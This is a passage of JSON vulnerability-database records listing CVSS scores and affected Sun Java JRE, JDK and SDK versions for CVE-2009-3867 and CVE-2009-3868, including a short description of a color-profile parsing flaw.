"cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3867"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:jre:1.3.1_8", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.3.1_7", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_05", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", 
"cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_3", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.3.1_01a", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_01", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:jre:1.4.2_04", "cpe:/a:sun:sdk:1.4.2_06", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_01", "cpe:/a:sun:sdk:1.3.1_2", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.3.1_24", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_1", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_6", "cpe:/a:sun:jre:1.3.1_02", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_07", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:sdk:1.3.1_9", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.4.2_20", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_7", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:jre:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.4.2_22", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:jre:1.4.2_08", "cpe:/a:sun:sdk:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", 
"cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_24", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_25", "cpe:/a:sun:jre:1.4.2_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.3.1_6", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:jre:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_8", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_5", "cpe:/a:sun:jre:1.4.2_02", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:jre:1.4.2_22", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_21", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:jre:1.3.1_3", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.4.2_03", "cpe:/a:sun:jre:1.3.1_9", "cpe:/a:sun:jre:1.4.2_07", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_5", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:jre:1.3.1_01", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.3.1_25", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2009-3867", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3867", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_01:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jdk:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_4:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_1:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_8:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jdk:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:06", "description": "Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 does not properly parse color profiles, which allows remote attackers to gain privileges via a crafted image file, aka Bug Id 6862970.", "edition": 6, "cvss3": {}, "published": "2009-11-05T16:30:00", "title": "CVE-2009-3868", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3868"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:jre:1.3.1_8", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.3.1_7", 
"cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_05", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_3", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.3.1_01a", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_01", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:jre:1.4.2_04", "cpe:/a:sun:sdk:1.4.2_06", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_01", "cpe:/a:sun:sdk:1.3.1_2", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.3.1_24", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_1", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_6", "cpe:/a:sun:jre:1.3.1_02", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_07", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:sdk:1.3.1_9", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.4.2_20", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_7", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:jre:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.4.2_22", 
"cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:jre:1.4.2_08", "cpe:/a:sun:sdk:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_24", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_25", "cpe:/a:sun:jre:1.4.2_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.3.1_6", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:jre:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_8", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_5", "cpe:/a:sun:jre:1.4.2_02", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:jre:1.4.2_22", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_21", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:jre:1.3.1_3", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.4.2_03", "cpe:/a:sun:jre:1.3.1_9", "cpe:/a:sun:jre:1.4.2_07", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_5", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:jre:1.3.1_01", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.3.1_25", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.3.1_07", 